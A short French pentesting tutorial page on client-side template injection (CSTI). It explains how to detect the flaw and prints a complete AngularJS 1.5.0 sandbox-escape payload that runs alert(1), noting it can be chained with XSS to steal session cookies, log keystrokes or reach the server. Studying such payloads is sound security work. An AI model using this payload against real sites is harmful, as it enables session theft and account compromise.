CSTI Techniques - Pentesting Web

Comment savoir si un site web est potentiellement vulnérable à une attaque CSTI ?

Si nous pouvons introduire une valeur dans un input comme dans le cas suivant avec la variable user et qu'elle est interprétée dans un output :

Par exemple, en constatant dans le code source du serveur web qu'il utilise des langages de programmation tels que Python, Java, Jinja2, Angularjs, etc. et que cela n'est pas assaini, la vulnérabilité pourrait être présente :

Grâce au site web PayloadsAllTheThings, nous trouverons toutes les injections possibles :

Dans ce cas, nous voyons que la version est la 1.5.0 de Angular.JS :

javascriptCopy code{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}

Nous pouvons envoyer des alertes comme dans l'attaque XXS :

Cela pourrait être utilisé pour combiner cette attaque avec le XSS et ainsi :

voler les cookies de session
capturer toutes les frappes clavier
obtenir un accès au serveur, etc

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?